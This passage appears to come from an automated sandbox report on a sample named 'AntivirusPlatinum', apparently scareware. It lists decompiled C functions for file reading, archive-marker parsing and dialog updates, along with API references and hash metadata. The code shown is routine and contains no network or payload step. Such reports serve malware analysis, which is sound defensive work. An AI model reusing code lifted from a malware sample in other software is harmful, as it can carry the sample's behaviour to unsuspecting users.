                                                                                                                                                              						if(_t70 != 0) {
                                                                                                                                                              							 *(_t127 + 8) =  *(_t127 + 8) | 0xffffffff;
                                                                                                                                                              							 *((intOrPtr*)(_t127 - 4)) = 0;
                                                                                                                                                              							_push(_t95);
                                                                                                                                                              							L8:
                                                                                                                                                              							while( *(_t127 + 8) == 0xffffffff) {
                                                                                                                                                              								_t80 = E00404FDC(_t127 - 0x102c, _t110); // executed
                                                                                                                                                              								 *((intOrPtr*)(_t127 - 8)) = _t80;
                                                                                                                                                              								_t82 = E0040568A(_t127 - 0x102c, _t110, _t127 - 0x302c, 0x2000); // executed
                                                                                                                                                              								 *((intOrPtr*)(_t127 - 0xc)) = _t82;
                                                                                                                                                              								if(_t82 >= 0x10) {
                                                                                                                                                              									_t122 = 0;
                                                                                                                                                              									while(1) {
                                                                                                                                                              										_t95 = _t127 + _t122 - 0x302c;
                                                                                                                                                              										if( *_t95 == 0x2a &&  *((char*)(_t127 + _t122 - 0x302b)) == 0x2a && E0040A53D(_t127 + _t122 - 0x302a, "*messages***", 0xb) == 0) {
                                                                                                                                                              											break;
                                                                                                                                                              										}
                                                                                                                                                              										if( *_t95 != 0x52 ||  *((char*)(_t127 + _t122 - 0x302b)) != 0x61 || E0040A53D(_t127 + _t122 - 0x302a, 0x412570, 4) != 0) {
                                                                                                                                                              											_t122 = _t122 + 1;
                                                                                                                                                              											if(_t122 <=  *((intOrPtr*)(_t127 - 0xc)) + 0xfffffff0) {
                                                                                                                                                              												continue;
                                                                                                                                                              											} else {
                                                                                                                                                              												L20:
                                                                                                                                                              												E004054ED(_t127 - 0x102c,  *((intOrPtr*)(_t127 - 0xc)) +  *((intOrPtr*)(_t127 - 8)) - 0x10, 0, 0);
                                                                                                                                                              												 *((intOrPtr*)(_t127 - 4)) =  *((intOrPtr*)(_t127 - 4)) + 1;
                                                                                                                                                              												if( *((intOrPtr*)(_t127 - 4)) < 0x40) {
                                                                                                                                                              													goto L8;
                                                                                                                                                              												} else {
                                                                                                                                                              													if( *(_t127 + 8) != 0xffffffff) {
                                                                                                                                                              														goto L22;
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              										goto L43;
                                                                                                                                                              									}
                                                                                                                                                              									 *(_t127 + 8) = _t122 +  *((intOrPtr*)(_t127 - 8));
                                                                                                                                                              									goto L20;
                                                                                                                                                              								}
                                                                                                                                                              								L43:
                                                                                                                                                              								_t76 = E00405074(_t95, _t127 - 0x102c);
                                                                                                                                                              								goto L44;
                                                                                                                                                              							}
                                                                                                                                                              							L22:
                                                                                                                                                              							asm("cdq");
                                                                                                                                                              							_t95 = 0;
                                                                                                                                                              							 *((intOrPtr*)(_t125 + 4)) = 0x20000;
                                                                                                                                                              							E004054ED(_t127 - 0x102c,  *(_t127 + 8), _t110, 0);
                                                                                                                                                              							_t75 = E0040A1EC( *((intOrPtr*)(_t125 + 4)) + 0x400);
                                                                                                                                                              							 *_t125 = _t75;
                                                                                                                                                              							if(_t75 != 0) {
                                                                                                                                                              								 *((char*)(_t75 +  *((intOrPtr*)(_t125 + 4)))) = 0;
                                                                                                                                                              								_t77 = E0040568A(_t127 - 0x102c, _t110,  *_t125,  *((intOrPtr*)(_t125 + 4)));
                                                                                                                                                              								_t104 = 0;
                                                                                                                                                              								 *((intOrPtr*)(_t125 + 4)) = _t77;
                                                                                                                                                              								if(_t77 > 0) {
                                                                                                                                                              									while(1) {
                                                                                                                                                              										_t79 =  *_t125;
                                                                                                                                                              										_t111 =  *((char*)(_t79 + _t95));
                                                                                                                                                              										_t95 = _t95 + 1;
                                                                                                                                                              										if(_t111 == 0) {
                                                                                                                                                              											goto L42;
                                                                                                                                                              										}
                                                                                                                                                              										if(_t111 != 0x5c) {
                                                                                                                                                              											if(_t111 == 0xd || _t111 == 0xa) {
                                                                                                                                                              												_t111 = 0xc;
                                                                                                                                                              											}
                                                                                                                                                              											goto L40;
                                                                                                                                                              										} else {
                                                                                                                                                              											_t116 =  *((char*)(_t79 + _t95)) - 0x22;
                                                                                                                                                              											if(_t116 == 0) {
                                                                                                                                                              												 *((char*)(_t79 + _t104)) = 0x22;
                                                                                                                                                              												goto L36;
                                                                                                                                                              											} else {
                                                                                                                                                              												_t117 = _t116 - 0x3a;
                                                                                                                                                              												if(_t117 == 0) {
                                                                                                                                                              													 *((char*)(_t79 + _t104)) = 0x5c;
                                                                                                                                                              													goto L36;
                                                                                                                                                              												} else {
                                                                                                                                                              													_t118 = _t117 - 0x12;
                                                                                                                                                              													if(_t118 == 0) {
                                                                                                                                                              														 *((char*)(_t79 + _t104)) = 0xa;
                                                                                                                                                              														goto L36;
                                                                                                                                                              													} else {
                                                                                                                                                              														_t119 = _t118 - 4;
                                                                                                                                                              														if(_t119 == 0) {
                                                                                                                                                              															 *((char*)(_t79 + _t104)) = 0xd;
                                                                                                                                                              															goto L36;
                                                                                                                                                              														} else {
                                                                                                                                                              															if(_t119 != 0) {
                                                                                                                                                              																L40:
                                                                                                                                                              																 *((char*)(_t79 + _t104)) = _t111;
                                                                                                                                                              															} else {
                                                                                                                                                              																 *((char*)(_t79 + _t104)) = 9;
                                                                                                                                                              																L36:
                                                                                                                                                              																_t95 = _t95 + 1;
                                                                                                                                                              															}
                                                                                                                                                              														}
                                                                                                                                                              													}
                                                                                                                                                              												}
                                                                                                                                                              											}
                                                                                                                                                              										}
                                                                                                                                                              										_t104 = _t104 + 1;
                                                                                                                                                              										if(_t95 <  *((intOrPtr*)(_t125 + 4))) {
                                                                                                                                                              											continue;
                                                                                                                                                              										}
                                                                                                                                                              										goto L42;
                                                                                                                                                              									}
                                                                                                                                                              								}
                                                                                                                                                              								L42:
                                                                                                                                                              								 *((char*)(_t104 +  *_t125)) = 0;
                                                                                                                                                              								 *((intOrPtr*)(_t125 + 4)) = _t104;
                                                                                                                                                              							}
                                                                                                                                                              							goto L43;
                                                                                                                                                              						} else {
                                                                                                                                                              							_t76 = E00405074(_t95, _t127 - 0x102c);
                                                                                                                                                              						}
                                                                                                                                                              						L44:
                                                                                                                                                              					} else {
                                                                                                                                                              						GetModuleFileNameA(0, _t66, 0x400);
                                                                                                                                                              						_t76 = E0040A3D9(_t97, _t127 - 0x40c, 0x5c);
                                                                                                                                                              						if(_t76 != 0) {
                                                                                                                                                              							_t66 = _t76 + 1;
                                                                                                                                                              							goto L5;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					return _t76;
                                                                                                                                                              				} else {
                                                                                                                                                              					 *_t63 =  *_t63 + _t63;
                                                                                                                                                              					return _t63;
                                                                                                                                                              				}
                                                                                                                                                              			}

























                                                                                                                                                              0x0040928c
                                                                                                                                                              0x0040928c
                                                                                                                                                              0x0040928c
                                                                                                                                                              0x0040928e
                                                                                                                                                              0x0040929f
                                                                                                                                                              0x004092a3
                                                                                                                                                              0x004092a6
                                                                                                                                                              0x004092a8
                                                                                                                                                              0x004092af
                                                                                                                                                              0x004092b5
                                                                                                                                                              0x004092dc
                                                                                                                                                              0x004092e0
                                                                                                                                                              0x004092ec
                                                                                                                                                              0x00409304
                                                                                                                                                              0x0040930b
                                                                                                                                                              0x0040931d
                                                                                                                                                              0x00409321
                                                                                                                                                              0x00409324
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409325
                                                                                                                                                              0x00409335
                                                                                                                                                              0x0040933a
                                                                                                                                                              0x0040934f
                                                                                                                                                              0x00409354
                                                                                                                                                              0x0040935a
                                                                                                                                                              0x00409360
                                                                                                                                                              0x00409362
                                                                                                                                                              0x00409362
                                                                                                                                                              0x0040936c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409393
                                                                                                                                                              0x004093be
                                                                                                                                                              0x004093c4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004093c6
                                                                                                                                                              0x004093d0
                                                                                                                                                              0x004093e5
                                                                                                                                                              0x004093ea
                                                                                                                                                              0x004093f1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004093f7
                                                                                                                                                              0x004093fb
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004093fb
                                                                                                                                                              0x004093f1
                                                                                                                                                              0x004093c4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409393
                                                                                                                                                              0x004093cd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004093cd
                                                                                                                                                              0x004094bd
                                                                                                                                                              0x004094c3
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004094c8
                                                                                                                                                              0x00409401
                                                                                                                                                              0x00409404
                                                                                                                                                              0x00409405
                                                                                                                                                              0x00409410
                                                                                                                                                              0x00409417
                                                                                                                                                              0x00409425
                                                                                                                                                              0x0040942a
                                                                                                                                                              0x0040942e
                                                                                                                                                              0x00409437
                                                                                                                                                              0x00409445
                                                                                                                                                              0x0040944a
                                                                                                                                                              0x0040944e
                                                                                                                                                              0x00409451
                                                                                                                                                              0x00409453
                                                                                                                                                              0x00409453
                                                                                                                                                              0x00409455
                                                                                                                                                              0x00409459
                                                                                                                                                              0x0040945c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409461
                                                                                                                                                              0x004094a1
                                                                                                                                                              0x004094aa
                                                                                                                                                              0x004094aa
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409463
                                                                                                                                                              0x00409467
                                                                                                                                                              0x0040946a
                                                                                                                                                              0x00409497
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040946c
                                                                                                                                                              0x0040946c
                                                                                                                                                              0x0040946f
                                                                                                                                                              0x00409491
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409471
                                                                                                                                                              0x00409471
                                                                                                                                                              0x00409474
                                                                                                                                                              0x0040948b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00409476
                                                                                                                                                              0x00409476
                                                                                                                                                              0x00409479
                                                                                                                                                              0x00409485
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040947b
                                                                                                                                                              0x0040947d
                                                                                                                                                              0x004094ab
                                                                                                                                                              0x004094ab
                                                                                                                                                              0x0040947f
                                                                                                                                                              0x0040947f
                                                                                                                                                              0x0040949b
                                                                                                                                                              0x0040949b
                                                                                                                                                              0x0040949b
                                                                                                                                                              0x0040947d
                                                                                                                                                              0x00409479
                                                                                                                                                              0x00409474
                                                                                                                                                              0x0040946f
                                                                                                                                                              0x0040946a
                                                                                                                                                              0x004094ae
                                                                                                                                                              0x004094b2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004094b2
                                                                                                                                                              0x00409453
                                                                                                                                                              0x004094b4
                                                                                                                                                              0x004094b6
                                                                                                                                                              0x004094ba
                                                                                                                                                              0x004094ba
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040930d
                                                                                                                                                              0x00409313
                                                                                                                                                              0x00409313
                                                                                                                                                              0x004094c9
                                                                                                                                                              0x004092b7
                                                                                                                                                              0x004092bf
                                                                                                                                                              0x004092ce
                                                                                                                                                              0x004092d5
                                                                                                                                                              0x004092db
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004092db
                                                                                                                                                              0x004092d5
                                                                                                                                                              0x004094cc
                                                                                                                                                              0x00409290
                                                                                                                                                              0x00409290
                                                                                                                                                              0x00409292
                                                                                                                                                              0x00409292

                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000400,?,0000005C,00414C88,?,004098EC,?,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,0040D3F9,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe), ref: 004092BF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileModuleName
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 514040917-0
                                                                                                                                                              • Opcode ID: 8a059818d79f815d1da1c0fdc08b2b0f8e86ca2838fa7738cf816effd15a2a51
                                                                                                                                                              • Instruction ID: 5e47cf0ed6a20ba9c8d57e52932549557f7a3f3f30f472f0507eb0aadce207e7
                                                                                                                                                              • Opcode Fuzzy Hash: 8a059818d79f815d1da1c0fdc08b2b0f8e86ca2838fa7738cf816effd15a2a51
                                                                                                                                                              • Instruction Fuzzy Hash: 3A0184B6500204A9DF20A721DD45EEF3778DB95344F0045BBFB46F50C2DA789D49CD69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00406045(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                              				void* _t12;
                                                                                                                                                              				intOrPtr _t19;
                                                                                                                                                              
                                                                                                                                                              				_t19 = _a12;
                                                                                                                                                              				 *((char*)(_t19 + 0x109c)) = 0;
                                                                                                                                                              				if(E00407279(__ecx, _a4, _a8) == 0) {
                                                                                                                                                              					_t12 = E00405C10(__ecx, __edx, __eflags, 0xffffffff, _a4, _a8, _t19);
                                                                                                                                                              					__eflags = _t12 - 0xffffffff;
                                                                                                                                                              					if(_t12 == 0xffffffff) {
                                                                                                                                                              						goto L1;
                                                                                                                                                              					}
                                                                                                                                                              					FindClose(_t12); // executed
                                                                                                                                                              					_t8 = _t19 + 0x1098;
                                                                                                                                                              					 *_t8 =  *(_t19 + 0x1098) & 0x00000000;
                                                                                                                                                              					__eflags =  *_t8;
                                                                                                                                                              					 *((char*)(_t19 + 0xc10)) = E0040579E( *((intOrPtr*)(_t19 + 0xc08)));
                                                                                                                                                              					return 1;
                                                                                                                                                              				}
                                                                                                                                                              				L1:
                                                                                                                                                              				return 0;
                                                                                                                                                              			}





                                                                                                                                                              0x0040604c
                                                                                                                                                              0x00406052
                                                                                                                                                              0x00406060
                                                                                                                                                              0x0040606f
                                                                                                                                                              0x00406074
                                                                                                                                                              0x00406077
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040607a
                                                                                                                                                              0x00406086
                                                                                                                                                              0x00406086
                                                                                                                                                              0x00406086
                                                                                                                                                              0x00406092
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00406098
                                                                                                                                                              0x00406062
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?,?,?,?,?,?,004049B4,?,?,?,00000000,?,?), ref: 0040607A
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseFind
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1863332320-0
                                                                                                                                                              • Opcode ID: 016139225d3950fc2726837b29d2660fc3c0a39c7cd46741710581f0b07a340e
                                                                                                                                                              • Instruction ID: 1ba89066e6b26492de0991d89586bb912489ebcd511f1a1df6c7eb89e8bf18c6
                                                                                                                                                              • Opcode Fuzzy Hash: 016139225d3950fc2726837b29d2660fc3c0a39c7cd46741710581f0b07a340e
                                                                                                                                                              • Instruction Fuzzy Hash: CAF0E931004744B7CF215FB58805AD73F54EF02334F008A1AF9BD262D2C67661A4EB75
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405051(void* __ecx) {
                                                                                                                                                              				void* _t2;
                                                                                                                                                              				long _t3;
                                                                                                                                                              
                                                                                                                                                              				_t2 =  *(__ecx + 4);
                                                                                                                                                              				if(_t2 != 0xffffffff) {
                                                                                                                                                              					_t3 = GetFileType(_t2); // executed
                                                                                                                                                              					if(_t3 == 2 || _t3 == 3) {
                                                                                                                                                              						return 1;
                                                                                                                                                              					} else {
                                                                                                                                                              						return 0;
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              			}





                                                                                                                                                              0x00405051
                                                                                                                                                              0x00405057
                                                                                                                                                              0x0040505d
                                                                                                                                                              0x00405066
                                                                                                                                                              0x00405073
                                                                                                                                                              0x0040506d
                                                                                                                                                              0x0040506f
                                                                                                                                                              0x0040506f
                                                                                                                                                              0x00405059
                                                                                                                                                              0x0040505b
                                                                                                                                                              0x0040505b

                                                                                                                                                              APIs
                                                                                                                                                              • GetFileType.KERNELBASE(?,00405318,?,004056BF,000000FF,?,00000000,?,00000000), ref: 0040505D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FileType
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3081899298-0
                                                                                                                                                              • Opcode ID: 9ef2e2e64e8ea27a378ea434a61d5314f25fa8d2862a00f2364391826e643227
                                                                                                                                                              • Instruction ID: 1aa453c7d0f86835216dbc810814f2ca778ec8b6d3a3a4ed52031c25ee967b21
                                                                                                                                                              • Opcode Fuzzy Hash: 9ef2e2e64e8ea27a378ea434a61d5314f25fa8d2862a00f2364391826e643227
                                                                                                                                                              • Instruction Fuzzy Hash: DDC0127091094451CE609538494D45F2346D7433667684BB2E025D12E4CF38CC82FC45
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040BB29(CHAR* _a8, char _a12) {
                                                                                                                                                              				char _v1028;
                                                                                                                                                              				void* _t9;
                                                                                                                                                              
                                                                                                                                                              				wvsprintfA( &_v1028, _a8,  &_a12);
                                                                                                                                                              				_t9 = E0040AD46(0,  &_v1028); // executed
                                                                                                                                                              				return _t9;
                                                                                                                                                              			}





                                                                                                                                                              0x0040bb40
                                                                                                                                                              0x0040bb4f
                                                                                                                                                              0x0040bb55

                                                                                                                                                              APIs
                                                                                                                                                              • wvsprintfA.USER32 ref: 0040BB40
                                                                                                                                                                • Part of subcall function 0040AD46: GetDlgItem.USER32 ref: 0040AD57
                                                                                                                                                                • Part of subcall function 0040AD46: ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0040AE8F), ref: 0040AD84
                                                                                                                                                                • Part of subcall function 0040AD46: SendMessageA.USER32(00000000,000000B1,00000000,000000FF), ref: 0040AD90
                                                                                                                                                                • Part of subcall function 0040AD46: SendMessageA.USER32(00000000,000000C2,00000000,0041259A), ref: 0040AD9F
                                                                                                                                                                • Part of subcall function 0040AD46: SendMessageA.USER32(?,000000B1,05F5E100,05F5E100), ref: 0040ADB3
                                                                                                                                                                • Part of subcall function 0040AD46: SendMessageA.USER32(?,0000043A,00000000,?), ref: 0040ADCA
                                                                                                                                                                • Part of subcall function 0040AD46: SendMessageA.USER32(?,00000444,00000001,0000003C), ref: 0040AE05
                                                                                                                                                                • Part of subcall function 0040AD46: SendMessageA.USER32(?,000000C2,00000000,0040AE8F), ref: 0040AE14
                                                                                                                                                                • Part of subcall function 0040AD46: SendMessageA.USER32(?,000000B1,05F5E100,05F5E100), ref: 0040AE1C
                                                                                                                                                                • Part of subcall function 0040AD46: SendMessageA.USER32(?,00000444,00000001,0000003C), ref: 0040AE40
                                                                                                                                                                • Part of subcall function 0040AD46: SendMessageA.USER32(?,000000C2,00000000,004125D0), ref: 0040AE51
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$ItemShowWindowwvsprintf
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3976247692-0
                                                                                                                                                              • Opcode ID: 5f134b3a6a48b1da08cc8969ca167bcf95950b867095aa8a3e93a4b6447c38e7
                                                                                                                                                              • Instruction ID: 42f10b7e191d8a10b733246c62dab6ef4ab6fe2402209f352080973538f3fee1
                                                                                                                                                              • Opcode Fuzzy Hash: 5f134b3a6a48b1da08cc8969ca167bcf95950b867095aa8a3e93a4b6447c38e7
                                                                                                                                                              • Instruction Fuzzy Hash: 80D09EB540420E6BDF10EB90DC45FE9777DBB0430DF0440A5BB15E6080D674D61A8B69
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E0040B283(intOrPtr _a4, intOrPtr _a12) {
                                                                                                                                                              				long _t4;
                                                                                                                                                              
                                                                                                                                                              				_t4 = SendDlgItemMessageA( *0x419f80, 0x68, 0x402, E0040A8F1(_a4, _a12), 0); // executed
                                                                                                                                                              				return _t4;
                                                                                                                                                              			}




                                                                                                                                                              0x0040b2a0
                                                                                                                                                              0x0040b2a6

                                                                                                                                                              APIs
                                                                                                                                                              • SendDlgItemMessageA.USER32(00000068,00000402,00000000,?,?), ref: 0040B2A0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ItemMessageSend
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3015471070-0
                                                                                                                                                              • Opcode ID: 0d12b71308204e384a32f16a7f63ddf877073e16bb697978e336ecb594957348
                                                                                                                                                              • Instruction ID: 6849b772ee6339a491bc1e2b639edc61c43db45e96c8e4cd59dca12df05aa9dd
                                                                                                                                                              • Opcode Fuzzy Hash: 0d12b71308204e384a32f16a7f63ddf877073e16bb697978e336ecb594957348
                                                                                                                                                              • Instruction Fuzzy Hash: EFC01231280301BBEB02AB009D0AF5A3A22BB80700F00C928F340A40F1CBB20831EA19
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 28%
                                                                                                                                                              			_entry_(void* __eflags) {
                                                                                                                                                              				void* _t3;
                                                                                                                                                              
                                                                                                                                                              				E0040A6C0(_t3);
                                                                                                                                                              				_push(0);
                                                                                                                                                              				_push(0);
                                                                                                                                                              				_push(0);
                                                                                                                                                              				_push(0); // executed
                                                                                                                                                              				E0040D33C(); // executed
                                                                                                                                                              				return 0;
                                                                                                                                                              			}




                                                                                                                                                              0x0040a7d8
                                                                                                                                                              0x0040a7df
                                                                                                                                                              0x0040a7e0
                                                                                                                                                              0x0040a7e1
                                                                                                                                                              0x0040a7e2
                                                                                                                                                              0x0040a7e3
                                                                                                                                                              0x0040a7e8

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395770810.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395824576.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_12_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Module$EnvironmentFileLoadNameVariable$BitmapCommandDeleteDialogHandleIconInitializeLineObjectParam
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 376930393-0
                                                                                                                                                              • Opcode ID: c41b5129d60273e9029d0afe8789ae86aa97bb8e615f6db8ce5cba5aaf9764ec
                                                                                                                                                              • Instruction ID: 281e6f1e172df0da2b3e58d9bfa8b28dbafe7f6c866a4f4aacb9b346c6845e1d
                                                                                                                                                              • Opcode Fuzzy Hash: c41b5129d60273e9029d0afe8789ae86aa97bb8e615f6db8ce5cba5aaf9764ec
                                                                                                                                                              • Instruction Fuzzy Hash: 20A002C49242407CF94075F20E07D3B005CD5402083C51C7B3C44F1092D8BD9C14003B
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                              			E0040503E(void* __ecx) {
                                                                                                                                                              				int _t2;
                                                                                                                                                              
                                                                                                                                                              				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                              				return  ~(_t2 - 1) + 1;
                                                                                                                                                              			}




                                                                                                                                                              0x00405041
                                                                                                                                                              0x0040504a
                                                                                                                                                              0x0040504d

                                                                                                                                                              APIs
                                                                                                                                                              • SetEndOfFile.KERNELBASE(?,004046B2,?,?,?,?,?,00000000,?,?,00000000,?,?,00000000,?,?), ref: 00405041
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000C.00000002.395273488.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000C.00000002.395260573.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395507388.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                              • Associated: 0000000C.00000002.395572641.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
